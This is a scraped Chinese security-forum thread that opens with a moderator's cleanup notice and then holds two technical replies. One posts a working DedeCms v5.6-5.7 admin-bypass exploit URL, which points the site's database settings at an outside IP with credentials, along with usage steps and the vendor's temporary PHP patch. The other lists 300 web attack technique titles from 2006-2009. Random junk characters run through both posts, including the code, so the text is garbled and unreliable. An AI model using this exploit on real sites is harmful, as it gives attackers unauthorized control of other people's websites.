最近看过此主题的会员

返回列表 发帖

论坛内容及无效ID将进行一次清理

由于论坛近段时间疏于管理、再加上各种和谐压力,交流气氛也不如从前。所以有必要进行一次清理。望大家理解!

 

您可能还想看的主题:

新人报道!

最全最完美的黑链代码写法大全

Asprain论坛注册用户上传图片漏洞

优蛋 /115网盘专用下载工具/ V2.1.11.126 简体绿色版

来过

最近一直在闭门修行。。所以一直没上,今天有时间发一个贴 证明存在

Nginx配置文件详解

最近神马的论坛 神马的QQ群有木有蛋疼的家伙?

【原创首发】每天就我一个人,我会孤单的

分享你的行业见闻,快速获得非安全中积分及邀请码

非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:無情发表,本帖发表者無情符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者無情和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

早该做了

TOP

提示: 作者被禁止或删除 内容自动屏蔽

TOP

/抠鼻  大叔不许把我的小马甲给清了。。。
讨厌啊,姐才不是圈内人呢~

TOP

织梦(DedeCms) v5.6-5.7 越权访问漏洞
http://www.XXXX.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

8 k+ P) ?$ b/ |$ W" t3 R
把上面validate=dcug改为当前的验证码,即可直接进入网站后台
3 p9 G3 v$ h$ f) d$ R/ F
此漏洞的前提是必须得到后台路径才能实现
% a7 ?" }: u8 G5 D8 g1 u
官方临时解决办法:
7 x& E4 D$ d. r+ g3 H
找到include/common.inc.php文件,把:

' @' _7 ?9 s* v! s& A' z! e
    foreach($_REQUEST as $_k=>$_v)4 H' a, E2 `* c0 m+ O0 T2 S
    {9 L$ H: D; I+ c2 M+ ]4 G2 }. s
        var_dump($_k);% K/ [2 N4 N' ~! S1 S; S
        if( strlen($_k)>0 && preg_match('#^(cfg_|GLOBALS)#',$_k) )
5 m- d& L+ c; J5 {        {
8 M1 s* K: p) {& B' f            exit('Request var not allow!');: o, }$ A5 h9 ?. ]0 ^* D+ K
        }- k6 u. M1 Q7 d) r
    }

) |9 F5 X- j! i% e
换成:
. i) e6 |8 F$ A6 S4 N* k" E( v" k  ^
    //检查和注册外部提交的变量
4 f( Z& x) H; s, m    function CheckRequest(&$val) {
  L- d. i# T( j2 t" U, ]3 @! ~( {. u        if (is_array($val)) {
, C/ I2 m" {. O% L            foreach ($val as $_k=>$_v) {9 i$ \7 o' ?+ t, \4 v
                CheckRequest($_k);
, |) e9 U; y. `                CheckRequest($val[$_k]);; j1 J% c6 D! ^* R* {
            }
1 H) R# v: F+ g        } else
, b' B6 p; w- D8 D7 t9 U        {+ B* r3 M5 U. n. c' h3 \
            if( strlen($val)>0 && preg_match('#^(cfg_|GLOBALS)#',$val) )! L" S' \5 B& D6 W/ H
            {
! F7 y: C2 h0 D! `4 w                exit('Request var not allow!');
5 w3 s: ?# i) N; I& E* i8 L            }
% B8 V2 u" Z2 K9 V$ U# C        }
# j5 K9 _; U% J    }3 G2 f1 N" E) ~% Q
    CheckRequest($_REQUEST);' M- M/ O! K0 L/ n: G/ }! U' f8 ~
! ]: X7 |9 T8 p! _3 p
( \8 U5 x& V& P; u- T
, G8 s5 X1 \, F* i8 t# k+ Q) ~
0 i( F* W" j4 n  H& V' k

5 o3 O" l! t4 ]+ E- l' q2 n+ I8 a
' i: g/ A/ C' `0 @7 j

. E+ C2 P) f/ D! S& P  R+ ?9 ~  |0 F8 N5 a$ W

" |9 f) M# [- d+ I; X1 u6 U7 L, C( ~; h4 Z6 F

" T2 X# D8 M$ o* N( U# k
4 h$ d1 Q4 y- y" N# F- f
/ c1 X; X0 j5 P, I! B% `1 ~: v# l; r. a# C
# `1 e( Q; j4 ^0 U- ^5 M: D6 e
4 g# d4 S7 N8 A3 O& B0 j" K) H4 M

. E; J0 [$ w. n+ j1 Q
* i9 a' x6 [4 L2 y5 f公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

(2006-2009)300个攻击技术总结
(2006:1-65 | 2007:66-148 | 2008:149-218 | 2009:219-300) 300种思路,300个变通思维。部分文章需翻墙看。2 X! a8 @9 Q# A$ a5 l
1.The Attack of the TINY URLs8 F" P) `- f- K& o% K
2.Backdooring MP3 Files
% z9 J5 K6 H- k2 M" Q- F7 {3.Backdooring QuickTime Movies
6 C8 F- A" S, z) d- V5 W4.CSS history hacking with evil marketing
; o7 X% u  g$ g7 t- E7 p5.I know where you've been
3 b" k" X& M3 d0 P) J  m: z6.Stealing Search Engine Queries with JavaScript
: x% }) O8 ^  o7 e' H  n" Y5 o7.Hacking RSS Feeds
# L* q2 Y0 P! I/ C8.MX Injection : Capturing and Exploiting Hidden Mail Servers
6 g7 _; V0 _0 a% @5 n9.Blind web server fingerprinting6 O8 Q7 z+ G, a1 _) _( O
10.JavaScript Port Scanning
" |; n0 C6 _; u5 e+ ^11.CSRF with MS Word
1 S3 O: s  s7 t# \12.Backdooring PDF Files
' b, I0 d, p' S: }! x. u. k$ G4 s13.Exponential XSS Attacks( n$ @% G' A  p! e, P
14.Malformed URL in Image Tag Fingerprints Internet Explorer
0 z/ l  O+ O" i$ @15.JavaScript Portscanning and bypassing HTTP Auth" t3 V7 N' L  x% e4 O
16.Bruteforcing HTTP Auth in Firefox with JavaScript
. q4 \/ F' W) |17.Bypassing Mozilla Port Blocking. S: S( L7 k! I% `8 X( Z) d# j9 _9 N
18.How to defeat digg.com
( z& p- O8 i1 g5 q7 \19.A story that diggs itself0 \/ G5 Z( y  [
20.Expect Header Injection Via Flash
5 i, k# l* g: n' f) g0 o/ J21.Forging HTTP request headers with Flash
' z( B* E5 q7 x22.Cross Domain Leakage With Image Size
/ g! r/ g1 v9 P5 `6 u- N& d2 ?5 M4 F23.Enumerating Through User Accounts
. [+ t- L1 y8 j' h; d' N; G24.Widespread XSS for Google Search Appliance
; C/ l+ x! i) P& b. z( A+ ^25.Detecting States of Authentication With Protected Images& _+ d8 ?! y4 V9 ?
26.XSS Fragmentation Attacks
3 m& j/ L* a/ p$ |2 k' |6 Y27.Poking new holes with Flash Crossdomain Policy Files
6 l6 o4 V: K+ {$ z28.Google Indexes XSS
! d; s) B5 _7 g( }" M7 k9 S/ v29.XML Intranet Port Scanning7 S2 X. O2 |# T* [% G% I9 d% x" ^
30.IMAP Vulnerable to XSS
+ s  V- `9 Q8 [# d31.Detecting Privoxy Users and Circumventing It+ G# {5 X0 U3 ?
32.Using CSS to De-Anonymize' `, Q# c* C5 p* ~$ O# @
33.Response Splitting Filter Evasion
/ F% E) [# _9 P' n. z( \34.CSS History Stealing Acts As Cookie" w! U5 E6 x+ F  V, V
35.Detecting FireFox Extentions9 K2 z) u8 E) ^# I& ^3 {6 [' c
36.Stealing User Information Via Automatic Form Filling" G, G8 |3 o9 Y5 ?5 @
37.Circumventing DNS Pinning for XSS
& g, `3 \0 K1 }' Q3 g8 B5 N38.Netflix.com XSRF vuln% v2 ]' K4 s5 @; r, `7 B/ ^
39.Browser Port Scanning without JavaScript& x# }" I- U, t3 w% O
40.Widespread XSS for Google Search Appliance
' |" y# P0 y9 q41.Bypassing Filters With Encoding' P1 _' i8 T* y0 I
42.Variable Width Encoding0 N  w. p6 r" M
43.Network Scanning with HTTP without JavaScript% B, A- X0 R- q8 O" Z
44.AT&T Hack Highlights Web Site Vulnerabilities & I# w2 P  P9 f: c4 i, V, `
45.How to get linked from Slashdot1 [- W# t+ \3 t& F
46.F5 and Acunetix XSS disclosure
1 d2 I- k! h0 u7 w47.Anti-DNS Pinning and Circumventing Anti-Anti DNS pinning; q% q  Q% _$ h- m& Q" Y
48.Google plugs phishing hole
2 H9 @6 n6 h7 }% h: L& o5 H  X49.Nikon magazine hit with security breach4 T' G  \  g7 {
50.Governator Hack
; z' n) P( t' S& i; o9 \+ u51.Metaverse breached: Second Life customer database hacked
- ~/ {2 L7 e8 t/ r* U52.HostGator: cPanel Security Hole Exploited in Mass Hack
; D2 d9 N/ c' S8 @2 w( o53.Firefox Extensions
$ C4 D: X& x' |54.ABC News (AU) XSS linking the reporter to Al Qaeda6 r5 E- ]% h  a7 H$ i3 y7 A
55.Account Hijackings Force LiveJournal Changes9 m$ @& ~$ j* C
56.Xanga Hit By Script Worm1 i* v  B3 i0 D8 u" E/ w
57.Advanced Web Attack Techniques using GMail7 W2 J! |- R: I4 ^; W" `
58.PayPal Security Flaw allows Identity Theft  W0 o" R' H( ~" o5 L! V
59.Internet Explorer 7 "mhtml:" Redirection Information Disclosure( C8 j& M9 @3 R% q1 T
60.Bypassing of web filters by using ASCII
1 ]( I/ W* a. ]2 @/ g0 j! n61.Selecting Encoding Methods For XSS Filter Evasion" N/ W! ^% f) p6 \# E; [5 d! t
62.Adultspace XSS Worm7 B: r/ `+ O- x* s7 m: n9 g" {
63.Anonymizing RFI Attacks Through Google, Q- `. n3 @! n) j* T9 _" k6 X* N
64.Google Hacks On Your Behalf. c/ R+ c3 }' O8 k/ E  j& P! s  [. Z
65.Google Dorks Strike Again$ F& d* g5 V* E0 O4 _
66.Cross-Site Printing
. e5 i  I4 k4 @6 G3 o. D2 H67.Stealing Pictures with Picasa
9 ~3 K5 |0 I" W* d' D3 V68.HScan Redux) B- p% O$ K8 x/ R
69.ISO-8895-1 Vulnerable in Firefox to Null Injection2 u) l5 Y$ J9 {) @8 J
70.MITM attack to overwrite addons in Firefox
' b; [* ~$ y/ Y1 A71.Microsoft ASP.NET Request Validation Bypass Vulnerability * O3 d/ x; B0 N8 M, t
72.Non-Alpha-Non-Digit 3
8 D2 p" f2 {5 `- X; k* {8 l1 v73.Steal History without JavaScript7 U: X3 _3 K6 P1 X8 X1 {8 f* ~
74.Pure Java??, Pure Evil?? Popups5 l2 G% i; k4 Y  M" T" _2 Y
75.Google Adsense CSRF hole# Q! N6 Q8 L# B
76.There’s an OAK TREE in my blog!?!?!0 \# P) M( d1 I4 [( Y
77.BK for Mayor of Oak Tree View
  y3 O4 v& e. e" k. k" }6 M78.Google Docs puts Google Users at Risk- K/ B' r7 c* M0 A1 N0 ]
79.All Your Google Docs are Belong To US…
+ h3 W2 D; J+ l: Q80.Java Applets and DNS Rebinding
6 X, \. E/ {( z/ Z9 ]81.Scanning internal Lan with PHP remote file opening.7 b& C" T1 A1 w, J  F1 F- m1 A) s
82.Firefox File Handling Woes
) G% f, c0 [: K9 t83.Firefoxurl URI Handler Flaw, s- N; R& \+ C6 J3 r& o
84.Bugs in the Browser: Firefox’s DATA URL Scheme Vulnerability1 N. {7 r1 d' `( ~
85.Multiviews Apache, Accept Requests and free listing
; a7 E: S7 l# d: w0 N86.Optimizing the number of requests in blind SQL injection, D' t1 X' |' m5 H  C! a) G" a$ M
87.Bursting Performances in Blind SQL Injection - Take 2 ! V: x$ A* L1 y
88.Port Scan without JavaScript
" }, t/ H% h+ w9 c, ]0 T, z% f89.Favorites Gone Wild
% e0 D- c. ^2 h( u; ~: C- D5 H5 s90.Cross-Browser Proxy Unmasking
% ]6 ?7 C0 V$ ]! X9 x& y91.Spoofing Firefox protected objects
$ L! y" K' P2 T: b( Z* f92.Injecting the script tag into XML7 d. ?3 ]) Q- o" A: l6 p
93.Login Detection without JavaScript
8 s. K8 E9 `! m94.Anti-DNS Pinning ( DNS Rebinding ) : Online Demonstration * @. G. B1 S4 P) D- t- Y, M2 M
95.Username Enumeration Timing Attacks   g! z; Y! E. K
96.Google GMail E-mail Hijack Technique
$ x# K1 H, T" [5 u: y2 _9 N97.Recursive Request DoS! }7 A6 v) J1 O7 |7 [5 A+ F
98.Exaggerating Timing Attack Results Via GET Flooding7 F- O, Z' f" \/ O5 {  E! u
99.Initiating Probes Against Servers Via Other Servers& M! s! z6 [6 l: X8 G  \( |' V, G
100.Effects of DNS Rebinding On IE’s Trust Zones2 `8 A( `0 E/ @7 w2 d; d: s2 P$ k
101.Paper on Hacking Intranets Using Websites
  D. A2 R4 K2 ]2 m' @102.More Port Scanning - This Time in Flash* q/ c( f; t( I) D+ k3 g
103.HTTP Response Splitting and Data: URI scheme in Firefox
( S9 L0 Y- k$ x4 Z! \  ~104.Res:// Protocol Local File Enumeration" \: A9 g  s9 ]9 D  s" ~
105.Res Timing Attack
6 }' a1 ?) Z0 t( h" @' h  R6 D106.IE6.0 Protocol Guessing
# A7 `4 k( ?9 O" G' K. ]107.IE 7 and Firefox Browsers Digest Authentication Request Splitting  c. W) L, b% Q, _
108.Hacking Intranets Via Brute Force; K! ^  K; M2 e- N, F
109.Hiding JS in Valid Images
8 b  [; ]) J2 p2 D110.Internet Archiver Port Scanner
! O; M; e6 F# C9 D4 |111.Noisy Decloaking Methods
! W, s1 K- L0 n3 |- h! X112.Code Execution Through Filenames in Uploads
2 d  w, X% L- A( N113.Cross Domain Basic Auth Phishing Tactics
9 Z1 Z, K2 g% p" j5 |8 L. f9 \7 k114.Additional Image Bypass on Windows
7 i& i, w- _+ I$ j7 e6 Y6 U115.Detecting users via Authenticated Redirects
. ]  H8 E8 w8 K5 w2 }116.Passing Malicious PHP Through getimagesize()* ~5 N: K( [$ }* ]# _
117.Turn Any Page Into A Greasemonkey Popup
$ Y* S/ z4 \, i1 R; Z/ u118.Enumerate Windows Users In JS* z2 W- |9 \4 L
119.Anti-DNS Pinning ( DNS Rebinding ) + Socket in FLASH
: [: Y. u) Q9 [120.Iframe HTTP Ping
( T' e- ~& g5 L121.Read Firefox Settings (PoC)
! G. K5 d' z7 n1 |122.Stealing Mouse Clicks for Banner Fraud, ?8 _6 w2 ~  x* s  A, Q; r2 _
123.(Non-Persistent) Untraceable XSS Attacks
6 R) K1 ]0 F. ]124.Inter Protocol Exploitation
1 v" h& z2 h- ]4 J125.Detecting Default Browser in IE$ F6 X. _, Z: L1 `8 |7 _
126.Bypass port blocking in Firefox, Opera and Konqueror.) p; m* W7 g& o+ B/ K8 W" K9 W9 {
127.LocalRodeo Detection
6 ?. ]1 X5 L! n3 Y+ \9 [# H  r128.Image Names Gone Bad% C2 u$ e) e% m$ e) q& B
129.IE Sends Local Addresses in Referer Header- _5 O$ y% o$ i
130.PDF XSS Can Compromise Your Machine! e* L1 B( @# h  w( Z. m
131.Universal XSS in Adobe’s Acrobat Reader Plugin
, V! T% b( A, u9 w& [3 z6 K132.Firefox Popup Blocker Allows Reading Arbitrary Local Files
4 G  ~% w- R+ U9 o9 y, f133.IE7.0 Detector* r9 i1 g" X2 J# V9 r
134.overwriting cookies on other people’s domains in Firefox.
- s7 ?: W3 Z) k% g6 W135.Embeding SVG That Contains XSS Using Base64 Encoding in Firefox8 o9 o2 P9 u0 U8 L# l. X7 c
136.Firefox Header Redirection JavaScript Execution
7 f7 F5 d7 Z' W137.More URI Stuff…
, i. Y  [$ E5 [' }138.Hacking without 0days: Drive-by Java6 m; B, v' v' z: U+ a0 j5 c
139.Google Urchin password theft madness2 ]) c; X8 Q% Y" k! b* w0 b) w7 w+ H' t
140.Username Enumeration Vulnerabilities6 `1 m$ S4 t$ O3 ]7 s3 W5 `
141.Client-side SQL Injection Attacks& a4 I0 B* o- A0 [
142.Content-Disposition Hacking; J1 h; x* W* ]$ Y0 h! @* m
143.Flash Cookie Object Tracking3 g5 n- L1 n/ u- R
144.Java JAR Attacks and Features
4 r% I5 p4 n" r# Q, w145.Severe XSS in Google and Others due to the JAR protocol issues
. R; {5 ]) V$ \4 i. a146.Web Mayhem: Firefox’s JAR: Protocol issues
# H" ~0 o% O, S7 _# k$ D147.0DAY: QuickTime pwns Firefox
5 M( c. @- i1 R0 C1 B148.Exploiting Second Life
% X8 E. g# c. ]$ b9 \149.CUPS Detection2 f! y) A) [! j5 b; ?6 o
150.CSRFing the uTorrent plugin
  B! h" R8 D* f: F151.Clickjacking / Videojacking2 H9 ]  S0 V. S: X* W
152.Bypassing URL Authentication and Authorization with HTTP Verb Tampering4 T8 q4 w3 w3 u% q7 y7 E
153.I used to know what you watched, on YouTube (CSRF + Crossdomain.xml)' E( ?1 o+ o  q$ [
154.Safari Carpet Bomb
* F, `# h  d9 g% q& D155.Flash clipboard Hijack5 U& n! a  v% l5 Q1 n
156.Flash Internet Explorer security model bug
5 p3 G1 s( p5 H& l6 u8 D' r157.Frame Injection Fun
8 m8 `/ k8 c9 Q1 t! P2 s158.Free MacWorld Platinum Pass? Yes in 2008!4 i/ H# f" v" V1 T& z
159.Diminutive Worm, 161 byte Web Worm
$ N1 l" x5 R# I6 `% ~) z) r4 H; _160.SNMP XSS Attack (1)
* b7 u" m' x! z) h* s- |161.Res Timing File Enumeration Without JavaScript in IE7.0, C% u/ D3 Q8 w
162.Stealing Basic Auth with Persistent XSS
# G7 z+ T2 e. s- @9 t" Q( [" D163.Smuggling SMTP through open HTTP proxies, z- D. b4 b$ |; s2 X
164.Collecting Lots of Free 'Micro-Deposits'
  l$ R. X6 N1 G, U! A( e- q165.Using your browser URL history to estimate gender
( Q) [  B, U& S  R, g166.Cross-site File Upload Attacks
: e7 W0 F3 u& ?3 O: D167.Same Origin Bypassing Using Image Dimensions1 m' S1 }/ z# w$ b/ i/ g7 r; k2 R* E
168.HTTP Proxies Bypass Firewalls' w; t+ n# z/ A+ y* w" b9 L
169.Join a Religion Via CSRF( y5 N# u4 W; Z& V1 ~7 Y+ t; g
170.Cross-domain leaks of site logins via Authenticated CSS
% U) \2 ~, I. u. E( u9 g' g171.JavaScript Global Namespace Pollution5 g3 K2 y; j# ^0 B
172.GIFAR+ J0 b; I# z; F* N8 O4 Y
173.HTML/CSS Injections - Primitive Malicious Code
( I3 Q2 ~6 I5 L9 B% |" P' g" z174.Hacking Intranets Through Web Interfaces
9 ]& l" D8 W$ Z175.Cookie Path Traversal
( f/ e2 h, B; A2 i. O- n. i176.Racing to downgrade users to cookie-less authentication
+ x" `# Q; \/ j7 p% ?: i, e177.MySQL and SQL Column Truncation Vulnerabilities; v) `( _6 a3 L" x
178.Building Subversive File Sharing With Client Side Applications
# P, K1 q5 E1 }, S179.Firefox XML injection into parse of remote XML
" q* d* T7 z8 k' t( |! p0 _7 d9 |" z$ J180.Firefox cross-domain information theft ) G2 C/ G# h) c+ t7 R
181.Firefox 2 and WebKit nightly cross-domain image theft
" b6 P9 \! J4 g182.Browser's Ghost Busters
$ F6 H6 q3 K$ R( a& Q183.Exploiting XSS vulnerabilities on cookies
4 p. n9 ^1 Y6 w( ?# R184.Breaking Google Gears' Cross-Origin Communication Model: Q0 e) M" K* ]
185.Flash Parameter Injection6 \3 |! _/ f/ U* C' [
186.Cross Environment Hopping
( G: i1 o/ i& x187.Exploiting Logged Out XSS Vulnerabilities
8 w% ?& p- ]3 l. D188.Exploiting CSRF Protected XSS. x$ V  o1 k. P) j
189.ActiveX Repurposing, (1, 2)3 h1 B- r2 |, |; z, v  m! K% f3 R
190.Tunneling tcp over http over sql-injection9 x0 |6 g6 L6 I5 p
191.Arbitrary TCP over uploaded pages+ P) A( h4 k+ O# ]9 d
192.Local DoS on CUPS to a remote exploit via specially-crafted webpage (1) : v) L' i; B/ U. y+ B5 k8 t9 k
193.JavaScript Code Flow Manipulation
2 V2 D2 Y; J' T194.Common localhost dns misconfiguration can lead to "same site" scripting
7 y- i# O, m8 Q6 W3 N195.Pulling system32 out over blind SQL Injection
! \% j+ B7 H3 q, z2 m, T/ Z196.Dialog Spoofing - Firefox Basic Authentication1 ^4 b0 r% {/ m5 s1 }  u5 M' C, p
197.Skype cross-zone scripting vulnerability
- ~6 y- @, X  b8 e! I: W) d1 f1 \198.Safari pwns Internet Explorer  g) c# R9 `, A% c7 I# l
199.IE "Print Table of Links" Cross-Zone Scripting Vulnerability
; ~' ]/ Q/ v5 E- S) S7 H200.A different Opera
8 V$ i# z! n4 P3 G- j2 ^3 X' H201.Abusing HTML 5 Structured Client-side Storage' l- R0 q1 e  z/ R  G
202.SSID Script Injection
7 R6 B& [9 E0 K& i* M0 _203.DHCP Script Injection
/ {* l' Y2 r( ^* W7 `9 F3 J204.File Download Injection
8 D/ r9 e9 G0 T9 f/ X& j$ J4 Y' ^205.Navigation Hijacking (Frame/Tab Injection Attacks)
/ M+ j* c+ Z. Q# g1 Y& U206.UPnP Hacking via Flash
9 F4 c9 z8 F) {2 q$ h207.Total surveillance made easy with VoIP phone. a, }+ x- R  m8 W
208.Social Networks Evil Twin Attacks
) M$ X, S0 [" ?( c209.Recursive File Include DoS2 N$ j' w. p2 t" e
210.Multi-pass filters bypass; V4 p' u1 c5 k& t1 J
211.Session Extending2 v+ N+ E. `; X& U2 V+ c* q
212.Code Execution via XSS (1)
! t1 @- [6 _6 G; ^, V; u/ _* F213.Redirector’s hell0 [3 [% ?0 a& Q8 y: i
214.Persistent SQL Injection4 H- S& F5 q. x3 h1 v% u' Y) t
215.JSON Hijacking with UTF-7. \' t( T+ a1 A; G/ K
216.SQL Smuggling
" s. l; o8 u5 |& v217.Abusing PHP Sockets (1, 2) $ a( W! z) I% \
218.CSRF on Novell GroupWise WebAccess
1 l; n& v8 d% J: y. G219.Persistent Cookies and DNS Rebinding Redux
, n* f* M3 z8 p  |: Q$ s. r  h/ n220.iPhone SSL Warning and Safari Phishing
  V. Q. T" ]" J221.RFC 1918 Blues$ M: u/ n8 k* w3 d) ]' m2 r5 V1 i
222.Slowloris HTTP DoS
. M' t# |! @* P& G4 [223.CSRF And Ignoring Basic/Digest Auth! c" m1 C5 J# Y1 U; i$ u
224.Hash Information Disclosure Via Collisions - The Hard Way
' D" ~; p, H: A- `225.Socket Capable Browser Plugins Result In Transparent Proxy Abuse
9 R1 M4 F; p3 }  O226.XMLHTTPReqest “Ping” Sweeping in Firefox 3.5+
& Q5 J# l- S8 u, l& j227.Session Fixation Via DNS Rebinding
# G( r6 x, o6 _& t228.Quicky Firefox DoS
' l3 n' }5 g9 R2 ?: y+ p229.DNS Rebinding for Credential Brute Force% b: B& }1 _9 _! @1 A( t
230.SMBEnum/ R: e! n; k6 D
231.DNS Rebinding for Scraping and Spamming9 _# m  N9 ]8 E# r; O
232.SMB Decloaking
7 |) s( ~. A: k233.De-cloaking in IE7.0 Via Windows Variables
! D+ u! r& S& r234.itms Decloaking
" U6 Y( `4 V2 ?' s% F235.Flash Origin Policy Issues% b* }8 l& M$ ^3 z* A  j& U9 c- j, `4 @
236.Cross-subdomain Cookie Attacks
- p# [, V  ^8 q- N" V9 X237.HTTP Parameter Pollution (HPP)' i3 r/ `$ g# ]1 {8 \% G
238.How to use Google Analytics to DoS a client from some website.
( l* L+ D# f2 C! V+ h. ~. e239.Our Favorite XSS Filters and how to Attack them
5 k5 e& A) t2 v9 v240.Location based XSS attacks
. n& H; z; b0 X# C+ |241.PHPIDS bypass
1 l! s1 q. {+ d; p242.I know what your friends did last summer( x7 I2 O8 `# ~& |- ^1 t7 @
243.Detecting IE in 12 bytes$ l' y6 ^2 a0 p' X4 i0 U
244.Detecting browsers javascript hacks6 Q" E5 a: k1 T+ S8 `
245.Inline UTF-7 E4X javascript hijacking
3 y6 y8 v/ }/ r! q. v246.HTML5 XSS  y$ S3 z. W2 `5 C/ J. }4 ?
247.Opera XSS vectors
2 j" h( |2 k& O5 C248.New PHPIDS vector' X# U# B& ?: ~. D+ V! J9 h
249.Bypassing CSP for fun, no profit4 n, B/ @4 B) N* K: s
250.Twitter misidentifying context  Z5 s8 R0 j4 O1 z) e0 ]
251.Ping pong obfuscation7 H: [( Y1 q5 `$ {2 j. k6 w
252.HTML5 new XSS vectors
* \! B& L( O6 K/ ]5 C253.About CSS Attacks5 K5 `4 F* g$ J* @4 Z
254.Web pages Detecting Virtualized Browsers and other tricks
. j2 c5 h- \7 H% D, I( w) {255.Results, Unicode Left/Right Pointing Double Angel Quotation Mark . r4 S: t/ m- _2 N7 b2 l5 J
256.Detecting Private Browsing Mode
0 l1 S- ^0 g1 S2 O+ h9 r257.Cross-domain search timing' l5 o4 n9 j) ?, O) [8 H( }7 S
258.Bonus Safari XXE (only affecting Safari 4 Beta)
; q0 D6 v) o; I: X: X259.Apple's Safari 4 also fixes cross-domain XML theft
5 H" y/ E3 v: @4 Z( u- z1 V# V; p260.Apple's Safari 4 fixes local file theft attack
* f- d. B" B" q! R0 Q261.A more plausible E4X attack, X+ [9 c# R) _) M5 A
262.A brief description of how to become a CA
" w6 [* n+ t6 q- b% p263.Creating a rogue CA certificate8 k9 ~# ]+ I" ]9 M7 i. ^% \
264.Browser scheme/slash quirks 9 |. A8 d" a5 E1 f( h1 {. f
265.Cross-protocol XSS with non-standard service ports
5 D9 P+ c/ m8 E- D9 s" L7 Z266.Forget sidejacking, clickjacking, and carjacking: enter “Formjacking”
7 L% @( X0 R, [  x( a9 q3 F3 {267.MD5 extension attack( O- ?4 B$ m4 V* M5 g  o
268.Attack - PDF Silent HTTP Form Repurposing Attacks$ K. Z5 g# _% x( \! _
269.XSS Relocation Attacks through Word Hyperlinking' B' v$ q3 P, A8 d  R) `% l
270.Hacking CSRF Tokens using CSS History Hack
# j/ r) _+ X! W# J271.Hijacking Opera’s Native Page using malicious RSS payloads
/ C) c5 w/ c. g0 w" A272.Millions of PDF invisibly embedded with your internal disk paths% {/ T# U9 }2 j( m# d# i
273.Exploiting IE8 UTF-7 XSS Vulnerability using Local Redirection
+ ], n. P7 O" s3 q: G274.Pwning Opera Unite with Inferno’s Eleven
/ Z# V( [. E! j9 b) |275.Using Blended Browser Threats involving Chrome to steal files on your computer# V# X& l8 ]0 Y# r0 L
276.Bypassing OWASP ESAPI XSS Protection inside Javascript+ g) X( v1 C& l% ~( m, x/ o% F& D1 Y
277.Hijacking Safari 4 Top Sites with Phish Bombs
- T) d+ ^$ U% s$ W( I- M0 V) Q278.Yahoo Babelfish - Possible Frame Injection Attack - Design Stringency' H( d5 l$ a/ r7 S3 X- q
279.Gmail - Google Docs Cookie Hijacking through PDF Repurposing & PDF
' d1 T3 Z/ `. y% L+ B/ D9 C280.IE8 Link Spoofing - Broken Status Bar Integrity: b' O3 C' Y2 o  r
281.Blind SQL Injection: Inference thourgh Underflow exception
' i0 N; W# A: D9 |) f; z282.Exploiting Unexploitable XSS
- A8 N. A3 [. s& q! ?( g283.Clickjacking & OAuth% a. B8 ?$ K' @) C- v8 T9 T+ }
284.Google Translate - Google User Content - File Uploading Cross - XSS and Design Stringency - A Talk
2 T, r* F  u' _3 i! C/ C285.Active Man in the Middle Attacks
% m! t  w  x) R$ ?# W286.Cross-Site Identification (XSid)* Y2 z2 ~: N/ E3 L1 C( L
287.Microsoft IIS with Metasploit evil.asp;.jpg
7 W0 S4 |+ J* R288.MSWord Scripting Object XSS Payload Execution Bug and Random CLSID Stringency) S( }4 S4 Z5 P! Q6 k4 g! u' R9 ^! L
289.Generic cross-browser cross-domain theft
0 h- d( y/ T- I! |3 T% O290.Popup & Focus URL Hijacking
; @; I! a7 t9 J291.Advanced SQL injection to operating system full control (whitepaper)
" T+ E+ j/ s  p/ ?/ R292.Expanding the control over the operating system from the database6 O  U3 J0 t, i! w  F
293.HTML+TIME XSS attacks
- g% [; g; @% T/ Z294.Enumerating logins via Abuse of Functionality vulnerabilities
( t2 G+ S, c# _. w( R- x295.Hellfire for redirectors
; A4 }& {7 T" @296.DoS attacks via Abuse of Functionality vulnerabilities
3 R! j: Z, i! [297.URL Spoofing vulnerability in bots of search engines (#2) , C- [3 C+ d! m% J
298.URL Hiding - new method of URL Spoofing attacks
. M8 |9 N9 K2 U+ _; G299.Exploiting Facebook Application XSS Holes to Make API Requests! h( l1 O7 [! R( f2 H( q/ m
300.Unauthorized  TinyURL URL Enumeration Vulnerability
' Q+ ]4 b" H3 z% ~1 H9 v
+ j8 J; _' T8 O
+ B2 c# q0 ], g
) W, K' W4 e& \6 [5 l; R  |* ~/ z9 @6 j3 i4 Y/ S- h4 ~
( V6 C  i9 c( A" U: B- @
1 E9 N& T! l& ^
! {1 \4 ]; I7 I: A3 |) B/ @
5 j/ _) y' n, b$ |+ w& J

% D& w& F  G2 B9 x) d) K
; V8 d3 m0 S& E. g# l8 A& _/ V. W
! d- q  N4 K" ~. `5 n# _

' r" }/ \; W) I/ j
2 Z  H7 s  p* L: u, ~9 c
  a4 G+ m  o+ _% d, h
+ i, \& h% V$ y9 s0 `  m8 {# T# p. I
& d% f7 T" P' [9 u) [% V: w
公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表